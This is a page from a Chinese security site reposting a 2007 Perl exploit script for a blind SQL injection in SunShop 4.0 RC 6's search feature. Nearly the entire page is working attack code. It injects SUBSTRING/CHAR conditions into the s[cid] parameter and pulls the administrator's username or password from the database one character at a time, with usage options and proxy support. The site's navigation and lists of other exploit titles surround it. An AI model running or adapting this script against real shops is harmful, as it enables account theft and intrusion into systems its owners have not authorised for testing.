首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SunShop 4.0 RC 6 (search) Remote Blind SQL Injection Exploit
来源:dnx(at)hackermail.com 作者:DNX 发布时间:2007-08-27  
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
print "\n                         \\#'#/                      ";
print "\n                         (-.-)                       ";
print "\n   -----------------oOO---(_)---OOo------------------";
print "\n   | SunShop v4.0 RC 6 (search) Blind SQL Injection |";
print "\n   |      k1tk4t - Indonesia - newhack[dot]org      |";
print "\n   |      coded by DNX [dnx(at)hackermail.com]      |";
print "\n   --------------------------------------------------";
print "\n[!] Vendor: http://www.turnkeywebtools.com";
print "\n[!] Bug: in the search script, u can inject sql code in the s[cid] parameter";
print "\n[!] Solution: install v4.0.1";
print "\n[!] Usage: perl sunshop.pl [Host] [Path] <Options>";
print "\n[!] Example: perl sunshop.pl 127.0.0.1 /shop/ -i 1 -c 10 -o 1 -t ss_admins";
print "\n[!] Options:";
print "\n       -i [no]       Valid User-ID, default is 1";
print "\n       -c [no]       Valid Category-ID with products, default is 1";
print "\n       -o [no]       1 = get username (default)";
print "\n                     2 = get password";
print "\n       -t [name]     Changes the admin table name, default is admins";
print "\n       -p [ip:port]  Proxy support";
print "\n";
exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $user    = 1;
my $cat     = 1;
my $column  = "username";
my $table   = "admins";
my %options = ();
GetOptions(\%options, "i=i", "c=i", "o=i", "t=s", "p=s");

print "[!] Exploiting...\n";

if($options{"i"}) { $user = $options{"i"}; }
if($options{"c"}) { $cat = $options{"c"}; }
if($options{"o"} && $options{"o"} == 2) { $column = "password"; }
if($options{"t"}) { $table = $options{"t"}; }

syswrite(STDOUT, "data:", 5);

for(my $i = 1; $i <= 32; $i++)
{
my $found = 0;
my $h = 48;
while(!$found && $h <= 57)
{
   if(istrue2($host, $path, $table, $user, $i, $h))
   {
     $found = 1;
     syswrite(STDOUT, chr($h), 1);
   }
   $h++;
}
if(!$found)
{
   $h = 97;
   while(!$found && $h <= 122)
   {
     if(istrue2($host, $path, $table, $user, $i, $h))
     {
       $found = 1;
       syswrite(STDOUT, chr($h), 1);
     }
     $h++;
   }
}
}

print "\n[!] Exploit done\n";

sub istrue2
{
my $host  = shift;
my $path  = shift;
my $table = shift;
my $uid   = shift;
my $i     = shift;
my $h     = shift;

my $ua = LWP::UserAgent->new;
my $url = "http://".$host.$path."index.php?l=search_list&s[title]=Y&s[short_desc]=Y&s[full_desc]=Y&s[cid]=".$cat.")%20AND%20SUBSTRING((SELECT%20".$column."%20FROM%20".$table."%20WHERE%20id=".$uid."),".$i.",1)=CHAR(".$h.")/*";

if($options{"p"})
{
   $ua->proxy('http', "http://".$options{"p"});
}

my $response = $ua->get($url);
my $content = $response->content;
my $regexp = "Add To Cart";

if($content =~ /$regexp/)
{
   return 1;
}
else
{
   return 0;
}
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PHP FFI Extension 5.0.5 Local
·PHP Perl Extension Safe_mode B
·Joomla Component BibTeX <= 1.3
·SIDVault LDAP Server Preauth R
·PHP 5.2.3 php_ntuser ntuser_ge
·ProFTPD 1.x (module mod_tls) R
·PHP <= 5.2.3 (php_win32sti) Lo
·Mercury/32 v3.32-v4.51 SMTP Pr
·PHP <= 5.2.3 (php_win32sti) Lo
·PHP <= 5.2.0 (php_iisfunc.dll)
·Mercury/32 4.51 SMTPD CRAM-MD5
·Thomson SIP phone ST 2030 Remo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved